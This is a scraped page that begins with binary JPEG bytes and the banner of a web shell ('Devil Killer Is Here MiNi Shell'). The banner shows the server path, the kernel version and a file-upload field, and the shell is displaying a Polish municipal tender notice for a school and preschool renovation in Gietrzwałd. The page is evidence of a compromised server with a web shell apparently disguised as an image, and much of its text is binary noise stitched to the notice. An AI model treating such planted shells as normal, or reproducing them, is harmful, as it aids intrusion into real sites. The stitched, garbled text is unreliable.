JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20230203/

Linux 9dbcd5f6333d 5.15.0-102-generic #112-Ubuntu SMP Tue Mar 5 16:50:32 UTC 2024 x86_64
Upload File :
Current File : /home/vmanager/www/common/web/tenders/20230203/0008050401-N-2023.html

<!-- Version 1.0.0 --><style type="text/css"> .normal { color: black; } h1.title { }</style> <h1 class="text-center mt-5 mb-5">Ogłoszenie o zamówieniu<br/> Roboty budowlane<br/> Przebudowa z rozbudową budynku Zespołu Szkolno-Przedszkolnego w Gietrzwałdzie wraz z towarzyszącą infrastrukturą. </h1> <h2 class="bg-light p-3 mt-4">SEKCJA I - ZAMAWIAJĄCY</h2> <h3 class="mb-0">1.1.) Rola zamawiającego</h3> <p class="mb-0">Postępowanie prowadzone jest samodzielnie przez zamawiającego</p> <h3 class="mb-0">1.2.) Nazwa zamawiającego: <span class="normal">Gmina Gietrzwałd</span></h3> <h3 class="mb-0">1.4) Krajowy Numer Identyfikacyjny: <span class="normal">REGON 510742965</span></h3><h3 class="mb-0">1.5) Adres zamawiającego </h3> <h3 class="mb-0">1.5.1.) Ulica: <span class="normal">Olsztyńska 2</span></h3> <h3 class="mb-0">1.5.2.) Miejscowość: <span class="normal">Gietrzwałd</span></h3> <h3 class="mb-0">1.5.3.) Kod pocztowy: <span class="normal">11-036</span></h3> <h3 class="mb-0">1.5.4.) Województwo: <span class="normal">warmińsko-mazurskie</span></h3> <h3 class="mb-0">1.5.5.) Kraj: <span class="normal">Polska</span></h3> <h3 class="mb-0">1.5.6.) Lokalizacja NUTS 3: <span class="normal">PL622 - Olsztyński</span></h3> <h3 class="mb-0">1.5.9.) Adres poczty elektronicznej: <span class="normal">inwestycje@gietrzwald.pl</span></h3> <h3 class="mb-0">1.5.10.) Adres strony internetowej zamawiającego: <span class="normal">https://gietrzwald.bip.net.pl/</span></h3> <h3 class="mb-0"> 1.6.) Rodzaj zamawiającego: <span class="normal">Zamawiający publiczny - jednostka sektora finansów publicznych - jednostka samorządu terytorialnego</span> </h3> <h3 class="mb-0"> 1.7.) Przedmiot działalności zamawiającego: <span class="normal">Ogólne usługi publiczne</span> </h3> <h2 class="bg-light p-3 mt-4">SEKCJA II – INFORMACJE PODSTAWOWE</h2> <h3 class="mb-0">2.1.) Ogłoszenie dotyczy: </h3> <p class="mb-0"> Zamówienia publicznego </p> <h3 class="mb-0">2.2.) Ogłoszenie dotyczy usług społecznych i innych szczególnych usług: <span class="normal">Nie</span></h3> <h3 class="mb-0">2.3.) Nazwa zamówienia albo umowy ramowej: </h3> <p class="mb-0"> Przebudowa z rozbudową budynku Zespołu Szkolno-Przedszkolnego w Gietrzwałdzie wraz z towarzyszącą infrastrukturą. </p> <h3 class="mb-0">2.4.) Identyfikator postępowania: <span class="normal">ocds-148610-46bbbc80-a3b5-11ed-9236-36fed59ea7dd</span></h3> <h3 class="mb-0">2.5.) Numer ogłoszenia: <span class="normal">2023/BZP 00080504</span></h3> <h3 class="mb-0">2.6.) Wersja ogłoszenia: <span class="normal">01</span></h3> <h3 class="mb-0">2.7.) Data ogłoszenia: <span class="normal">2023-02-03</span></h3> <h3 class="mb-0">2.8.) Zamówienie albo umowa ramowa zostały ujęte w planie postępowań: <span class="normal">Tak</span></h3> <h3 class="mb-0">2.9.) Numer planu postępowań w BZP: <span class="normal">2023/BZP 00028263/01/P</span></h3> <h3 class="mb-0">2.10.) Identyfikator pozycji planu postępowań: </h3> <p class="mb-0">1.1.7 Przebudowa z rozbuodwą budynku Zespołu Szkolno Przedszkolnego w Gietrzwałdzie wraz z towarzyszącą infrastrukturą.</p> <h3 class="mb-0">2.11.) O udzielenie zamówienia mogą ubiegać się wyłącznie wykonawcy, o których mowa w art. 94 ustawy: <span class="normal">Nie</span></h3> <h3 class="mb-0">2.14.) Czy zamówienie albo umowa ramowa dotyczy projektu lub programu współfinansowanego ze środków Unii Europejskiej: <span class="normal">Nie</span></h3> <h3 class="mb-0">2.16.) Tryb udzielenia zamówienia wraz z podstawą prawną</h3> <p class="mb-0"> Zamówienie udzielane jest w trybie podstawowym na podstawie: art. 275 pkt 1 ustawy </p> <h2 class="bg-light p-3 mt-4">SEKCJA III – UDOSTĘPNIANIE DOKUMENTÓW ZAMÓWIENIA I KOMUNIKACJA</h2> <h3 class="mb-0">3.1.) Adres strony internetowej prowadzonego postępowania</h3> https://gmina-gietrzwald.ezamawiajacy.pl/ <h3 class="mb-0">3.2.) Zamawiający zastrzega dostęp do dokumentów zamówienia: <span class="normal">Nie</span></h3> <h3 class="mb-0">3.4.) Wykonawcy zobowiązani są do składania ofert, wniosków o dopuszczenie do udziału w postępowaniu, oświadczeń oraz innych dokumentów wyłącznie przy użyciu środków komunikacji elektronicznej: <span class="normal">Tak</span></h3> <h3 class="mb-0">3.5.) Informacje o środkach komunikacji elektronicznej, przy użyciu których zamawiający będzie komunikował się z wykonawcami - adres strony internetowej: <span class="normal">https://gmina-gietrzwald.ezamawiajacy.pl/</span></h3> <h3 class="mb-0">3.6.) Wymagania techniczne i organizacyjne dotyczące korespondencji elektronicznej: <span class="normal">określono w SWZ</span></h3> <h3 class="mb-0">3.8.) Zamawiający wymaga sporządzenia i przedstawienia ofert przy użyciu narzędzi elektronicznego modelowania danych budowlanych lub innych podobnych narzędzi, które nie są ogólnie dostępne: <span class="normal">Nie</span></h3> <h3 class="mb-0">3.12.) Oferta - katalog elektroniczny: <span class="normal">Nie dotyczy</span></h3> <h3 class="mb-0">3.14.) Języki, w jakich mogą być sporządzane dokumenty składane w postępowaniu: </h3> <p class="mb-0">polski</p> <h3 class="mb-0">3.15.) RODO (obowiązek informacyjny): <span class="normal">Zgodnie z art. 13 ust. 1 i 2 rozporządzenia Parlamentu Europejskiego i Rady (UE) 2016/679 z dnia 27 kwietnia 2016 r. w sprawie ochrony osób fizycznych w związku z przetwarzaniem danych osobowych i w sprawie swobodnego przepływu takich danych oraz uchylenia dyrektywy 95/46/WE (ogólne rozporządzenie o ochronie danych) (Dz. Urz. UE L 119 z 04.05.2016, str. 1), dalej „RODO”, informuję, że: <br/>	administratorem Pani/Pana danych osobowych jest Gmina Gietrzwałd, adres: <br/>ul. Olsztyńska 2 11-036 Gietrzwałd, tel /89/ 524 19 00, fax: /89/ 650 03 24, adres e-mail: gmina@gietrzwald.pl, <br/>	inspektorem ochrony danych osobowych w Gminie Gietrzwałd jest jest Maciej Żołnowski, inspektor@cbi24.pl<br/>	Pani/Pana dane osobowe przetwarzane będą na podstawie art. 6 ust. 1 lit. c RODO w celu związanym z postępowaniem o udzielenie zamówienia publicznego ZP.271.5.2023, Przebudowa z rozbudową budynku Zespołu Szkolno-Przedszkolnego w Gietrzwałdzie wraz z towarzyszącą infrastrukturą.<br/> 	odbiorcami Pani/Pana danych osobowych będą osoby lub podmioty, którym udostępniona zostanie dokumentacja postępowania w oparciu o przepisy Ustawy Pzp<br/>	Pani/Pana dane osobowe będą przechowywane, , przez okres 4 lat od dnia zakończenia postępowania o udzielenie zamówienia, a jeżeli czas trwania umowy przekracza 4 lata, okres przechowywania obejmuje cały czas trwania umowy;<br/>	obowiązek podania przez Panią/Pana danych osobowych bezpośrednio Pani/Pana dotyczących jest wymogiem ustawowym określonym w przepisach ustawy Pzp, związanym z udziałem w postępowaniu o udzielenie zamówienia publicznego; konsekwencje niepodania określonych danych wynikają z ustawy Pzp; <br/>	w odniesieniu do Pani/Pana danych osobowych decyzje nie będą podejmowane w sposób zautomatyzowany, stosowanie do art. 22 RODO;<br/>	posiada Pani/Pan:<br/>−	na podstawie art. 15 RODO prawo dostępu do danych osobowych Pani/Pana dotyczących;<br/>−	na podstawie art. 16 RODO prawo do sprostowania Pani/Pana danych osobowych;<br/>−	na podstawie art. 18 RODO prawo żądania od administratora ograniczenia przetwarzania danych osobowych z zastrzeżeniem przypadków, o których mowa w art. 18 ust. 2 RODO; <br/>−	prawo do wniesienia skargi do Prezesa Urzędu Ochrony Danych Osobowych, gdy uzna Pani/Pan, że przetwarzanie danych osobowych Pani/Pana dotyczących narusza przepisy RODO;<br/>	nie przysługuje Pani/Panu:<br/>−	w związku z art. 17 ust. 3 lit. b, d lub e RODO prawo do usunięcia danych osobowych;<br/>−	prawo do przenoszenia danych osobowych, o którym mowa w art. 20 RODO;<br/>−	na podstawie art. 21 RODO prawo sprzeciwu, wobec przetwarzania danych osobowych, gdyż podstawą prawną przetwarzania Pani/Pana danych osobowych jest art. 6 ust. 1 lit. c RODO.</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA IV – PRZEDMIOT ZAMÓWIENIA</h2><h3 class="mb-0">4.1.) Informacje ogólne odnoszące się do przedmiotu zamówienia.</h3> <h3 class="mb-0">4.1.1.) Przed wszczęciem postępowania przeprowadzono konsultacje rynkowe: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.1.2.) Numer referencyjny: <span class="normal">ZP.271.5.2023</span></h3> <h3 class="mb-0">4.1.3.) Rodzaj zamówienia: <span class="normal">Roboty budowlane</span></h3> <h3 class="mb-0">4.1.4.) Zamawiający udziela zamówienia w częściach, z których każda stanowi przedmiot odrębnego postępowania: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.1.5.) Wartość zamówienia: <span class="normal"> 4460935,77 PLN </span> </h3> <h3 class="mb-0">4.1.8.) Możliwe jest składanie ofert częściowych: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.1.13.) Zamawiający uwzględnia aspekty społeczne, środowiskowe lub etykiety w opisie przedmiotu zamówienia: <span class="normal">Nie</span></h3><h3 class="mb-0">4.2. Informacje szczegółowe odnoszące się do przedmiotu zamówienia:</h3> <h3 class="mb-0">4.2.2.) Krótki opis przedmiotu zamówienia</h3> <p class="mb-0"> 1.	Przedmiotem zamówienia jest przebudowa z rozbudową budynku Zespołu Szkolno-Przedszkolnego w Gietrzwałdzie wraz z towarzyszącą infrastrukturą<br/> 2.	Zakres przedmiotu zamówienia obejmuje w szczególności: <br/>OPCJA PODSTAWOWA<br/>Inwestycja: <br/>Element 1:<br/>-	przebudowa ostatniej kondygnacji budynku przy ul. Szkolnej 8 wraz<br/>z dachem w celu maksymalnego wykorzystania powierzchni, jaką daje poddasze szkoły na sale lekcyjne. <br/>-	umożliwienie komunikacji pomiędzy kondygnacjami i bryłami budynku poprzez zadaszenie tarasu. <br/>-	likwidacja barier architektonicznych szkoły poprzez budowę windy. <br/>-	w ramach termomodernizacji wymiana stolarki okienno-drzwiowej (w tym witryn stalowych wejścia głównego) na stolarkę aluminiową spełniającą wymogi normy cieplnej. <br/>-	przebudowa na wszystkich kondygnacjach budynku związana z ulokowaniem strefy przeciwpożarowej oraz przebudowa części pomieszczeń w związku z nowym układem sal<br/>-	rewitalizacja elewacji budynku i łącznika<br/>-	roboty instalacyjne sanitarne i elektryczne oraz teletechnika<br/><br/>Element 2:<br/>-	rozbudowa przedszkola o dodatkowy oddział. <br/><br/>Element 3:<br/> przebudowa i rewitalizacja obiektów zewnętrznych:<br/>-	przeniesienie i ogrodzenie placu zabaw <br/>-	wykonanie toru „Pumptrack”<br/><br/>Lokalizacja inwestycji<br/>- Dz. nr 533 obr. Gietrzwałd, gmina Gietrzwałd<br/><br/>Do poszczególnych elementów należy wykonanie:<br/>AD1. element 1 <br/>a)	przebudowa ostatniej kondygnacji budynku przy ul. Szkolnej 8 wraz<br/>z dachem w celu maksymalnego wykorzystania powierzchni, jaką daje poddasze szkoły na sale lekcyjne. <br/>-	demontaż istniejącego dachu wraz z pokryciem i konstrukcją<br/>-	roboty rozbiórkowe i demontaże instalacji wewnętrznych, ścianek i pokrycia posadzki ostatniej kondygnacji<br/>-	wykonanie rozbudowy ostatniej kondygnacji wraz z konstrukcja dachową , pokryciem i wykończeniem wewnętrznym i zewnętrznym<br/>-	nowe instalacje elektryczne i sanitarne na ostatniej kondygnacji<br/>-	odbudowa instalacji teletechnicznej (internetowej) w minimalnym zakresie, tj. w każdej z sal i pomieszczeniu biurowym musi być zlokalizowany minimum jedno gniazdo internetowe z gniazdem sieci zasilającej <br/>Ponadto wszystkie zlokalizowane w pomieszczeniach skrzynki zbiorcze i urządzenia należy odbudować lub przenieść w najbliższe miejsce.<br/><br/>b) umożliwienie komunikacji pomiędzy kondygnacjami i bryłami budynku poprzez zadaszenie tarasu. <br/>	-	roboty rozbiórkowe na tarasie i części budynku łącznika miedzy bryłami<br/>	-	zabudowa tarasu wraz z pokryciem dachowym<br/>	-	roboty wykończeniowe<br/><br/>c)	likwidacja barier architektonicznych szkoły poprzez budowę windy. <br/>-	roboty rozbiórkowe w konstrukcyjne przy dobudowie szybu windowego<br/>-	montaż windy w szybie<br/>-	roboty wykończeniowe dobudowy<br/>-	instalacje wewnętrzne<br/><br/>d)	w ramach termomodernizacji wymiana stolarki okienno-drzwiowej (w tym witryn stalowych wejścia głównego) na stolarkę spełniającą wymogi normy cieplnej. <br/>-	demontaże istniejącej stolarki okienno-drzwiowej i ślusarki (materiał do dyspozycji Inwestora)<br/>-	montaże nowej stolarki i ślusarki <br/>-	wymiany parapetów wewnętrznych i zewnętrznych<br/>-	obróbki i wykończenia ościeży a w przypadku uszkodzeń, remonty ścian przyległych<br/>UWAGA: Inwestor zrezygnował z części okien do wymiany. Rysunki pomocnicze w załączeniu w celu określenia zakresu robót.<br/><br/>e)	przebudowa na wszystkich kondygnacjach budynku związana z ulokowaniem strefy przeciwpożarowej oraz przebudowa części pomieszczeń w związku z nowym układem sal<br/>-	demontaże i rozbiórki w pomieszczeniach przebudowywanych<br/>-	nowy układ ścian wraz z wykończeniem sal i pomieszczeń <br/>-	przebudowy instalacji wewnętrznych w celu dostosowania do nowego układu<br/><br/>f)	rewitalizacja elewacji budynku i łącznika<br/>-	umycie i wzmocnienie istniejącej elewacji budynku<br/>-	docieplenie wg projektu technicznego (wyłączone z postepowania)<br/>-	wykonanie nowej elewacji budynku w nowej kolorystyce (Inwestor wymaga oprócz wykonania elewacji w pełnym zakresie w częściach gdzie będzie to wymagane, tj. rozbudowy, dobudowy i przeróbki w elewacji, wyłącznie na oczyszczeniu, wzmocnieniu, dezynfekcji i przemalowaniu istniejącej wyprawy elewacyjnej z dodatkami przeciw mchom i grzybom)<br/><br/>g)	roboty instalacyjne sanitarne i elektryczne oraz teletechnika<br/>-	instalacje wodno-kanalizacyjne wewnętrzne zgodnie z PT<br/>-	instalacja hydrantowa<br/>UWAGA: Inwestor zamienia wykonanie instalacji hydrantowej z rur ze stali nierdzewnej na stal ocynkowaną<br/>-	instalacja centralnego ogrzewania<br/>-	instalacje elektryczne wewnętrzne<br/>-	instalacja piorunochronna<br/>-	odbudowa instalacji teletechnicznej (internetowej) w minimalnym zakresie, tj. w każdej z sal i pomieszczeniu biurowym musi być zlokalizowany minimum jedno gniazdo internetowe z gniazdem sieci zasilającej <br/>Ponadto wszystkie zlokalizowane w pomieszczeniach skrzynki zbiorcze i urządzenia należy odbudować lub przenieść w najbliższe miejsce<br/><br/>AD2. element 2 <br/>a)	rozbudowa przedszkola o dodatkowy oddział. <br/>-	zgodnie z dokumentacją techniczną i zamienną<br/>Temat:	<br/>ROZBUDOWA BUDYNKU SZKOŁY PODSTAWOWEJ W GIETRZWAŁDZIE O ODDZIAŁ PRZEDSZKOLNY<br/>Adres:	dz. nr 533, Gietrzwałd, gm. Gietrzwałd	<br/>Przedmiotem wykonania jest rozbudowa istniejącego przedszkola o dodatkowy oddział przedszkolny przy budynku Szkoły Podstawowej w Gietrzwałdzie. <br/><br/>Szczegółowy zakres wykonania przedstawia dokumentacja techniczna sporządzona przez <br/>Archerezja Zwolińska+Projektanci Magdalena Zwolińska, ul. Zielona Dolina 28, 11-036 Gronity<br/><br/>W zakres wykonania wchodzi:<br/>Roboty budowlane:<br/>- konstrukcyjne<br/>-	architektoniczne<br/>(wg w/w dokumentacji projektowej)<br/>Roboty instalacyjne:<br/>-	Instalacja ogrzewania i wentylacji mechanicznej wykonać na podstawie rysunków zamiennych<br/>Należy przystosować lub wykonać alternatywnie wentylację w formie grawitacyjnej z zastosowaniem nawiewników higroskopijnych w stolarce i wentylatorami niskoszumowymi w przewodach grawitacyjnych wyprowadzonych w połaci dachowej. <br/>-	Instalacja elektryczna<br/>-	Instalacja wodno – kanalizacyjna<br/>-	Instalacja centralnego ogrzewania <br/>-	Instalacja oświetlenia awaryjnego i ewakuacyjne oraz domofonowa<br/>Zagospodarowanie terenu:<br/>-	przebudowy sieci i przyłączy<br/>-	nawierzchnie komunikacji<br/>-	ściany oporowe<br/>Powyższe roboty wykonać wg w/w dokumentacji projektowej<br/>Zamawiający powołał już kierownika rozbudowy przedszkola, wymagana będzie zmiana.<br/><br/>AD3. element 3<br/>a)	przeniesienie placu zabaw<br/>-	demontaż ostrożny istniejącego placu zabaw i zamontowanie w nowej lokalizacji na tej samej działce <br/>-	przygotowanie podłoża placu <br/>-	ogrodzenie terenu<br/><br/>b)	wykonanie toru „Pumptrack”<br/>Temat:	PUMPTRACK w Gietrzwałdzie<br/>Adres: dz. nr 533, Gietrzwałd, gm. Gietrzwałd<br/>Przedmiotem wykonania jest tor „Pumptrack” w Gietrzwałdzie.<br/>Szczegółowy zakres wykonania przedstawia dokumentacja techniczna sporządzona przez <br/>Archerezja Zwolińska+Projektanci Magdalena Zwolińska,ul. Zielona Dolina 28, 11-036 Gronity<br/><br/>W zakres wykonania wchodzi:<br/>Roboty budowlane:<br/>- nawierzchnia z masy asfaltowej (nawierzchnia maksymalnie gładka), warstwa gr min 5 cm<br/>- nawierzchnia z kostki betonowej ażurowej<br/>- ławka do odpoczynku<br/>- kosz na śmieci<br/>- tablica informacyjna<br/>- stojaki na rowery<br/>(wg w/w dokumentacji projektowej)<br/><br/>Poza zakresem wykonania:<br/>Roboty instalacyjne: oświetlenie terenu istniejące<br/>Wycinka drzew<br/>Roboty ziemne-Zamawiający wykona nasypy we własnym zakresie<br/><br/>Powyższe roboty należy wykonać wg w/w dokumentacji projektowej<br/><br/>Prawo opcji <br/>Zamawiający zastrzega sobie możliwość skorzystania z prawa opcji określonego w art. 441 Ustawy Prawo zamówień publicznych. Realizacja prawa opcji polegać będzie na podjęciu przez Zamawiającego po otwarciu ofert decyzji czy realizowany będzie jedynie zakres podstawowy zamówienia czy zakres podstawowy i „Opcja dodatkowa” rozszerzająca zakres podstawowy. Wybór Zamawiającego będzie podyktowany stosunkiem cen przedstawionych w ofertach do środków jakie Zamawiający Zamierza przeznaczyć na realizację zadania.<br/>Zamawiający określa, poniżej zakres rzeczowy „opcji dodatkowej”. Zamawiający skorzysta z prawa opcji jeżeli pozwolą mu na to posiadane środki finansowe.<br/>W razie nieudzielenia zamówienia opcjonalnego Wykonawcy nie przysługują jakiekolwiek roszczenia z tego tytułu. Zamówienie opcjonalne realizowane będzie na zasadach przewidzianych dla zamówienia podstawowego.<br/>Przedmiotem opcji jest:<br/>OPCJA DODATKOWA<br/>Element 3: <br/>przebudowa i rewitalizacja obiektów zewnętrznych<br/>-	rozbudowa placu zabaw o nowe zabawki <br/>-	wykonanie ogrodu dla dzieci przedszkolnych<br/>-	przebudowa/przełożenie lub wymiana nawierzchni placu przed budynkiem głównym w celu likwidacji nierówności<br/><br/>Lokalizacja inwestycji<br/>- Dz. nr 533 obr. Gietrzwałd, gmina Gietrzwałd<br/><br/>Do poszczególnych elementów należy wykonanie:<br/><br/>AD3. element 3<br/><br/>a)	rozbudowa placu zabaw<br/>-	dodatkowe wyposażenie placu zabaw w nowe zabawki <br/><br/>b)	wykonanie ogrodu dla dzieci przedszkolnych<br/>-	likwidacja podłoża z mączki ceglanej<br/>-	zgodnie z dokumentacją techniczną<br/>Szczegółowy zakres określa dokumentacja projektowa sporządzona przez GREENEA Iwona Michalewicz-Schilling<br/><br/>c)	przebudowa/przełożenie lub wymiana nawierzchni placu przed budynkiem głównym w celu likwidacji nierówności<br/>-	demontaż istniejącego pokrycia z kostki betonowej<br/>-	demontaże krawężników i obrzeży<br/>	-	uzupełnienia podbudowy i wyrównanie podkładów<br/>	-	regulacja studzienek i zaworów<br/>	-	nowa nawierzchnia i krawężniki, obrzeża.<br/><br/>Szczegółowy zakres przedmiotu zamówienia określa dokumentacja projektowa , specyfikacje, rysunki techniczne oraz pomocnicze przedmiary. </p> <h3 class="mb-0">4.2.6.) Główny kod CPV: <span class="normal">45453000-7 - Roboty remontowe i renowacyjne</span></h3> <h3 class="mb-0">4.2.7.) Dodatkowy kod CPV: </h3> <p class="mb-0">45450000-6 - Roboty budowlane wykończeniowe, pozostałe</p> <p class="mb-0">45214200-2 - Roboty budowlane w zakresie budowy obiektów budowlanych związanych ze szkolnictwem</p> <p class="mb-0">45331000-6 - Instalowanie urządzeń grzewczych, wentylacyjnych i klimatyzacyjnych</p> <p class="mb-0">45330000-9 - Roboty instalacyjne wodno-kanalizacyjne i sanitarne</p> <p class="mb-0">45300000-0 - Roboty instalacyjne w budynkach</p> <p class="mb-0">45331100-7 - Instalowanie centralnego ogrzewania</p> <h3 class="mb-0">4.2.8.) Zamówienie obejmuje opcje: <span class="normal">Tak</span></h3> <h3 class="mb-0">4.2.9) Rodzaj i maksymalna wartość opcji oraz okoliczności skorzystania z opcji: </h3> Zamawiający zastrzega sobie możliwość skorzystania z prawa opcji określonego w art. 441 Ustawy Prawo zamówień publicznych. Realizacja prawa opcji polegać będzie na podjęciu przez Zamawiającego po otwarciu ofert decyzji czy realizowany będzie jedynie zakres podstawowy zamówienia czy zakres podstawowy i „Opcja dodatkowa” rozszerzająca zakres podstawowy. Wybór Zamawiającego będzie podyktowany stosunkiem cen przedstawionych w ofertach do środków jakie Zamawiający Zamierza przeznaczyć na realizację zadania.<br/>Zamawiający określa, poniżej zakres rzeczowy „opcji dodatkowej”. Zamawiający skorzysta z prawa opcji jeżeli pozwolą mu na to posiadane środki finansowe. Maksymalna wartość opcji i wartość zamówienia podstawowego łącznie nie mogą przekroczyć środków jakie zamawiający zamierza przeznaczyć na realizację zadania.<br/>W razie nieudzielenia zamówienia opcjonalnego Wykonawcy nie przysługują jakiekolwiek roszczenia z tego tytułu. Zamówienie opcjonalne realizowane będzie na zasadach przewidzianych dla zamówienia podstawowego.<br/>Przedmiotem opcji jest:<br/>OPCJA DODATKOWA<br/>Element 3: <br/>przebudowa i rewitalizacja obiektów zewnętrznych<br/>-	rozbudowa placu zabaw o nowe zabawki <br/>-	wykonanie ogrodu dla dzieci przedszkolnych<br/>-	przebudowa/przełożenie lub wymiana nawierzchni placu przed budynkiem głównym w celu likwidacji nierówności<br/><br/>Lokalizacja inwestycji<br/>- Dz. nr 533 obr. Gietrzwałd, gmina Gietrzwałd<br/><br/>Do poszczególnych elementów należy wykonanie:<br/><br/>AD3. element 3<br/><br/>a)	rozbudowa placu zabaw<br/>-	dodatkowe wyposażenie placu zabaw w nowe zabawki <br/><br/>b)	wykonanie ogrodu dla dzieci przedszkolnych<br/>-	likwidacja podłoża z mączki ceglanej<br/>-	zgodnie z dokumentacją techniczną<br/>Szczegółowy zakres określa dokumentacja projektowa sporządzona przez GREENEA Iwona Michalewicz-Schilling<br/><br/>c)	przebudowa/przełożenie lub wymiana nawierzchni placu przed budynkiem głównym w celu likwidacji nierówności<br/>-	demontaż istniejącego pokrycia z kostki betonowej<br/>-	demontaże krawężników i obrzeży<br/>	-	uzupełnienia podbudowy i wyrównanie podkładów<br/>	-	regulacja studzienek i zaworów<br/>	-	nowa nawierzchnia i krawężniki, obrzeża. <!-- realizacja w dniach --> <h3 class="mb-0">4.2.10.) Okres realizacji zamówienia albo umowy ramowej: <span class="normal">15 miesiące</span></h3> <h3 class="mb-0">4.2.11.) Zamawiający przewiduje wznowienia: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.2.13.) Zamawiający przewiduje udzielenie dotychczasowemu wykonawcy zamówień na podobne usługi lub roboty budowlane: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.3.) Kryteria oceny ofert</h3> <h3 class="mb-0">4.3.1.) Sposób oceny ofert: <span class="normal">Oferta zostanie oceniona w oparciu o kryteria:<br/>1. Cena <br/>2. Okres gwarancji	na roboty budowlane</span></h3> <h3 class="mb-0">4.3.2.) Sposób określania wagi kryteriów oceny ofert: <span class="normal"> Procentowo </span></h3> <h3 